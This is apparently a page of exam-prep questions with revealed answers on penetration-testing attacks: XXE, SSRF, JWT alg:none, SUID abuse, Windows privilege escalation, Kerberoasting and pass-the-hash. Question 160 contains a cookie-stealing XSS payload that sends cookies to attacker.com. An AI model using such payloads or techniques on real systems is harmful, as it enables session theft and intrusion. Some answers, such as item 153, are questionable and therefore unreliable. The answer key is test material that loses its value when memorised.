CCNA Ptp Attacks Exploits Questions

31 of 181 questions · Page 3/3 · Ptp Attacks Exploits topic · Answers revealed

151
MCQmedium

A penetration tester is testing a web application and discovers an endpoint that returns XML data. The tester attempts to read /etc/passwd by injecting an external entity. Which type of attack is this?

A.XXE injection
B.Command injection
C.SSRF
D.SQL injection
AnswerA

XXE uses external entities to read files or make requests.

Why this answer

XML External Entity (XXE) injection allows reading files or performing SSRF via XML processing.

152
MCQmedium

While testing a Linux system, the tester finds a binary with the SUID bit set owned by root. The binary executes a command based on user input without verifying the path. Which privilege escalation technique does this exemplify?

A.Kernel exploit
B.Capability abuse
C.Cron job abuse
D.SUID binary exploitation
AnswerD

The SUID bit allows the binary to run as root, and PATH manipulation can lead to privilege escalation.

Why this answer

PATH manipulation exploits insecure binary execution by modifying the PATH variable to execute malicious code.

153
Multi-Selecthard

During a penetration test, the tester discovers a web application vulnerable to CSRF. The application uses SameSite cookies set to 'Lax'. Which THREE methods might the tester use to exploit the CSRF vulnerability?

Select 3 answers
A.Use XSS to execute a POST request
B.Change the cookie's SameSite attribute via JavaScript
C.Craft a GET request that triggers a state change
D.Use a subdomain to change the cookie's SameSite to 'None'
E.Force the form to submit via POST only
AnswersA, C, D

XSS can bypass CSRF protections entirely.

Why this answer

SameSite Lax still allows top-level GET requests; state-changing GET requests, XSS, and bypassing via subdomain can work. Changing cookie to Strict is not possible by attacker, and requiring POST only is not a bypass.

154
MCQmedium

A tester is performing a JWT attack and modifies the header to set the algorithm to 'none'. Which vulnerability are they exploiting?

A.Token theft
B.Weak secret brute-force
C.Kid injection
D.Algorithm confusion
AnswerD

alg:none is a type of algorithm confusion where the server accepts unsigned tokens.

Why this answer

Setting alg to 'none' bypasses signature verification, a known JWT vulnerability.

155
MCQmedium

A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?

A.DLL hijacking
B.Kerberoasting
C.Token impersonation using PrintSpoofer
D.AlwaysInstallElevated
AnswerC

PrintSpoofer leverages SeImpersonatePrivilege to get SYSTEM.

Why this answer

SeImpersonatePrivilege allows impersonating a client after authentication; tools like PrintSpoofer, RoguePotato exploit this to gain SYSTEM.

156
MCQeasy

During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?

A.World-writable files
B.SUID binaries
C.Files with extended attributes
D.SGID binaries
AnswerB

/4000 matches the SUID bit (4000 in octal).

Why this answer

The find command with -perm /4000 searches for files with SUID bit set, which can be exploited for privilege escalation.

157
MCQmedium

A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?

A.The service account's password hash
B.A valid domain user account
C.Administrator privileges on a domain controller
D.Local administrator access on a client machine
AnswerB

Any domain user can request TGS tickets for service accounts.

Why this answer

Kerberoasting requires a valid domain account to request TGS tickets for service accounts. No special privileges are needed beyond being authenticated. AS-REP roasting targets users without pre-authentication, not service accounts.

158
MCQmedium

During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?

A.Error-based SQL injection
B.Boolean-based blind SQL injection
C.UNION-based SQL injection
D.Time-based blind SQL injection
AnswerD

Time-based uses SLEEP or WAITFOR DELAY to extract data.

Why this answer

Time-based blind SQL injection uses conditional delays to infer the truth of queries based on response time.

159
MCQeasy

In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?

A.execute
B.launch
C.start
D.run
AnswerD

'run' or 'exploit' initiates the exploit.

Why this answer

The 'run' or 'exploit' command launches the exploit.

160
MCQmedium

While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like <script>document.location='http://attacker.com/?cookie='+document.cookie</script>. Which XSS type is this?

A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.SQL injection
AnswerB

Reflected XSS is injected and reflected immediately in the response.

Why this answer

Reflected XSS occurs when the injected script is reflected off the web server immediately.

161
Multi-Selectmedium

A penetration tester wants to pivot from a compromised Linux host to attack internal network resources that are not directly accessible. Which THREE tools or techniques can be used for pivoting?

Select 3 answers
A.psexec
B.Metasploit route command
C.chisel
D.SSH local port forwarding (-L)
E.Windows Remote Desktop (RDP)
AnswersB, C, D

Metasploit route adds routes through a compromised host to pivot.

Why this answer

SSH port forwarding (local, remote, dynamic) and tools like chisel and ligolo-ng are commonly used for pivoting in Linux environments.

162
MCQhard

A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?

A.DLL hijacking
B.Kernel exploit
C.Token impersonation
D.PATH manipulation
AnswerD

Correct: If the SUID binary runs a command using a relative path, PATH manipulation can hijack it to run as root.

Why this answer

If a SUID binary executes commands (e.g., via system() or exec()), it may be exploited to run arbitrary commands as root, especially if the path is not absolute.

163
MCQhard

During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?

A.PrintSpoofer
B.PowerUp
C.CrackMapExec
D.Mimikatz
AnswerA

PrintSpoofer leverages SeImpersonatePrivilege to get SYSTEM.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege to escalate to SYSTEM.

164
Multi-Selectmedium

During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?

Select 3 answers
A.JuicyPotato
B.Mimikatz
C.RoguePotato
D.PrintSpoofer
E.PowerUp
AnswersA, C, D

Another potato variant for the same privilege.

Why this answer

PrintSpoofer, RoguePotato, and JuicyPotato exploit SeImpersonatePrivilege to gain SYSTEM. Mimikatz is for credential dumping, and PowerUp is a PowerShell script for privilege escalation but not specific to this privilege.

165
MCQmedium

During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?

A.Cross-Site Request Forgery (CSRF)
B.Local File Inclusion (LFI)
C.Server-Side Request Forgery (SSRF)
D.XML External Entity (XXE)
AnswerC

SSRF allows the server to make requests to internal/cloud resources.

Why this answer

The IP 169.254.169.254 is the cloud metadata endpoint; accessing it indicates SSRF.

166
Multi-Selectmedium

A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?

Select 2 answers
A.Accessing the AWS metadata endpoint at 169.254.169.254
B.Scanning internal IP addresses and ports
C.Crafting a JavaScript payload for XSS
D.Injecting SQL queries into the URL
E.Forcing the server to send a POST request
AnswersA, B

This is a classic SSRF target.

Why this answer

SSRF can access internal services like cloud metadata endpoints and perform internal port scans.

167
MCQmedium

During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?

A.CrackMapExec
B.evil-winrm
C.wmiexec
D.psexec
AnswerC

wmiexec uses WMI (Windows Management Instrumentation) for remote command execution.

Why this answer

wmiexec (part of Impacket) allows execution of commands on a Windows host via WMI using valid credentials, suitable for lateral movement.

168
MCQhard

During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?

A.JWT algorithm confusion attack (alg:none)
B.JWT timing attack
C.JWT kid injection
D.JWT brute-force of the secret
AnswerA

The alg:none attack bypasses signature verification.

Why this answer

If the server accepts the 'none' algorithm, the tester can forge tokens by setting the algorithm to 'none' and removing the signature.

169
MCQmedium

After compromising a Windows workstation, the tester wants to extract password hashes from the local SAM database. Which Metasploit meterpreter command should be used?

A.getsystem
B.getuid
C.shell
D.hashdump
AnswerD

hashdump extracts password hashes from SAM.

Why this answer

hashdump dumps the SAM database hashes.

170
MCQhard

During a penetration test, the tester gains a Meterpreter session on a Windows target and wants to escalate privileges to SYSTEM. The current user has the SeImpersonatePrivilege token. Which tool should the tester use to exploit this privilege?

A.PrintSpoofer
B.Windows-Exploit-Suggester
C.whoami /priv
D.Mimikatz
AnswerA

PrintSpoofer uses SeImpersonatePrivilege to gain SYSTEM.

Why this answer

PrintSpoofer exploits the SeImpersonatePrivilege to impersonate SYSTEM tokens.

171
MCQhard

During a web application test, the tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester modifies the JWT header to set the algorithm to 'none' and removes the signature. The server accepts the token. What type of attack is this?

A.JWT algorithm confusion (alg:none)
B.JWT injection
C.JWT session stealing
D.JWT secret brute-force
AnswerA

This is a JWT algorithm confusion attack where the 'none' algorithm bypasses signature verification.

Why this answer

Setting the JWT algorithm to 'none' exploits a misconfiguration where the server does not enforce signature verification, leading to JWT algorithm confusion.

172
Multi-Selectmedium

A penetration tester is performing a Kerberoasting attack. Which TWO steps are required for a successful Kerberoasting attack?

Select 2 answers
A.Enumerate domain admins
B.Request TGS tickets for service accounts
C.Perform a relay attack
D.Crack the TGS tickets offline using Hashcat
E.Capture NTLMv2 hashes using Responder
AnswersB, D

TGS tickets are encrypted with the service account's NTLM hash.

Why this answer

Kerberoasting involves requesting TGS tickets for service accounts and then cracking the tickets offline.

173
MCQmedium

You are testing a web application and notice that it uses JSON Web Tokens (JWT) for authentication. You change the algorithm to 'none' and remove the signature, and the token is accepted. Which JWT vulnerability did you exploit?

A.KID injection
B.Algorithm none attack
C.Weak secret brute-force
D.Token replay
AnswerB

Setting alg to 'none' bypasses signature verification.

Why this answer

Alg:none attack exploits weak validation that accepts unsigned tokens.

174
MCQmedium

A tester is performing a privilege escalation on a Windows system and finds that the user has SeImpersonatePrivilege enabled. Which tool could be used to escalate to SYSTEM?

A.PsExec
B.PrintSpoofer
C.evil-winrm
D.pth-winexe
AnswerB

Correct: PrintSpoofer exploits SeImpersonatePrivilege to get SYSTEM.

Why this answer

SeImpersonatePrivilege can be exploited using tools like PrintSpoofer or Potato attacks to impersonate SYSTEM tokens.

175
MCQhard

You have obtained a NTLM hash of a domain admin account and want to authenticate to a remote server without cracking the password. Which technique enables you to authenticate using the hash?

A.Pass-the-Hash
B.AS-REP roasting
C.Pass-the-Ticket
D.Kerberoasting
AnswerA

Pass-the-Hash uses the NTLM hash to authenticate to services that accept NTLM authentication.

Why this answer

Pass-the-hash uses the NTLM hash directly to authenticate without needing the plaintext password. Tools like pth-winexe or CrackMapExec can perform this.

176
MCQeasy

Which Metasploit command is used to display information about the current meterpreter session, including the target OS and user?

A.hashdump
B.getuid
C.getsystem
D.sysinfo
AnswerD

sysinfo provides detailed system information including OS and architecture.

Why this answer

The 'sysinfo' meterpreter command displays system information such as OS, architecture, and sometimes user context.

177
MCQhard

During a penetration test, you successfully execute a Meterpreter session on a Windows target. You want to dump password hashes from the SAM database. Which Meterpreter command should you use?

A.getsystem
B.hashdump
C.getuid
D.sysinfo
AnswerB

hashdump retrieves password hashes from the SAM.

Why this answer

hashdump is the Meterpreter command to dump SAM hashes.

178
MCQmedium

A penetration tester has gained a low-privilege shell on a Windows server and discovers the user has the SeImpersonatePrivilege. Which tool could the tester use to escalate privileges to SYSTEM?

A.Mimikatz
B.SharpHound
C.PowerUp
D.PrintSpoofer
AnswerD

PrintSpoofer leverages SeImpersonatePrivilege to get SYSTEM access.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege to escalate privileges on Windows.

179
MCQmedium

During a Windows privilege escalation attempt, the tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool is commonly used to exploit this privilege to gain SYSTEM?

A.PrintSpoofer
B.SharpUp
C.Mimikatz
D.PowerUp
AnswerA

PrintSpoofer leverages SeImpersonatePrivilege to escalate to SYSTEM.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege to impersonate SYSTEM and spawn a shell.

180
MCQmedium

During a Linux privilege escalation attempt, a tester finds a binary with the SUID bit set that is not on the GTFOBins list. The binary executes /bin/bash with the effective UID of root. What is the most likely way to exploit this?

A.Use GTFOBins to find a suitable exploit
B.Perform a buffer overflow on the binary
C.Run the binary with the -p flag
D.Modify the PATH to include a fake binary
AnswerC

Running a SUID binary that spawns a shell with -p preserves the effective UID, giving root.

Why this answer

If a binary runs a shell or command as root, the tester can simply run it to get a root shell.

181
MCQeasy

A tester is attempting to crack WPA2 handshakes captured from a wireless network. Which hashcat mode should be used?

A.-m 13100
B.-m 1000
C.-m 0
D.-m 22000
AnswerD

Correct: Mode 22000 is for WPA/WPA2.

Why this answer

Hashcat mode 22000 is used for WPA-PBKDF2-PMKID+EAPOL (WPA/WPA2) handshakes.

← PreviousPage 3 of 3 · 181 questions total

Ready to test yourself?

Try a timed practice session using only Ptp Attacks Exploits questions.